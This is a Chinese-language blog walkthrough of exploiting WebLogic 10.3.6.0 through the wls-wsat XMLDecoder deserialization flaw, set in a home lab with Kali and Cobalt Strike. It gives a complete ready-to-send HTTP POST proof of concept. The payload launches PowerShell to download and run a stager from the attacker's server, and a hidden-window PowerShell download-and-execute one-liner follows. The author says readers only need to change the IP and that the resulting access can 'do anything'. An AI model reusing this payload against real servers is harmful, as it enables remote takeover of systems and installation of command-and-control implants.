关于weblogic 10.3.6.0 的漏洞复现（2）

今天小R又学会了一个工具的使用，而且这个工具很强大很强大。 待会介绍。

一、需要的试验环境：

一台宿主机，虚拟机（kali+window2008或其他版本的windows）  
1.宿主机需要的工具：BT（burpsuite）

2.虚拟机kali：CobaltStrike 工具（我用的是3.8版本），由于这个工具容易被百度云和谐我就步发百度云链接了。可以找我要：QQ1356187559

3.windows server2008  ：搭建一个weblogic环境（这里就不介绍搭建了，网上有）

二、实验说明

此实验不仅仅局限于内网，外网也可以，但是外网必须得要有一个服务器。否则是不可以实现的。由于没有购买服务器，所以用内网测。把宿主机当做攻击机，kali作为攻击者的服务器， window server2008则为靶机。
在这里：

攻击机IP：192.168.2.5

服务器kali IP：192.168.2.7

靶机windwos server 2008 IP ：192.168.2.11

三、操作步骤。

1. 用攻击机IP访问靶机的weblogic看看weblogic是否能够正常运行。

2. 能够正常运行之后，就开始用kali里面的工具了。解压后进入然后在终端里打开

3.运行打开teamserver发现提示以下信息，得输入 本机的host（不是127.0.0.1，是192.168.2.7），密码随意设（要记住）。  PS： 这里得讲一下，小R在第一次运行这个teamserver这个程序的时候，出现权限不够这一句话，若有

有雷同的情况，可以用这条   chomd a+x ./teamserver   命令来修改权限，sudo是不可以的。

4.运行后，这个终端不要关闭，打开另外一个终端，运行  ./cobaltstrike 除了填入密码以外，其它的可以不用变，端口随便。这里选择默认

5. 点击如图所示的按钮，URL Path 随便你写，端口也随便。然后点击Launch。  复制这段代码。

6. 打开宿主机的Burpsuite。抓取该 网址的包 http://192.168.2.11:7001/wls-wsat/CoordinatorPortType后，利用Burpsuite来修改包发出去。 这里注意得是POST请求，默认的是get，得改过来，除此之外，还得添加Content-Type: text/xml  这句话。

POC发给你们。

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.2.11:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: SL_G_WPT_TO=zh; SL_GWPT_Show_Hide_tmp=1; SL_wptGlobTipTmp=1
Connection: close
Content-Length: 1130

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="4">
<void index="0">
<string>powershell.exe</string>
</void>
<void index="1">
<string>IEX</string>
</void>
<void index="2">
<string>((new-object</string>
</void>
<void index="3">
<string>net.webclient).downloadstring('http://192.168.2.7:5555/R'))</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

好了好了，现在来分析一下这段代码。有没有发现前面利用     powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.7:5555/R.Hacker'))"

在这里我是分开写的，因为weblogic不能识别空格，所以就利用这个分段的模式来解决。  至于 -nop  -w  hidden -c 为啥没有我就不解释了，反正没用。

各位做的时候主要也就是改下ip就行了。

7.  发出去以后，在windows 2008 server 中打开任务管理器。你就会在发现一个powershell的漏洞

8.注入代码成功，再回头看看 kali里面的工具吧。打开监听功能。根据如图情况填写。

9.然后看如图，成功上线。  上线了以后能干什么吗？？？   你跟我讲能干什么？？？   他什么都能干，这里就不介绍，网上有教程。 小R有点累。 不懂就加QQ问我吧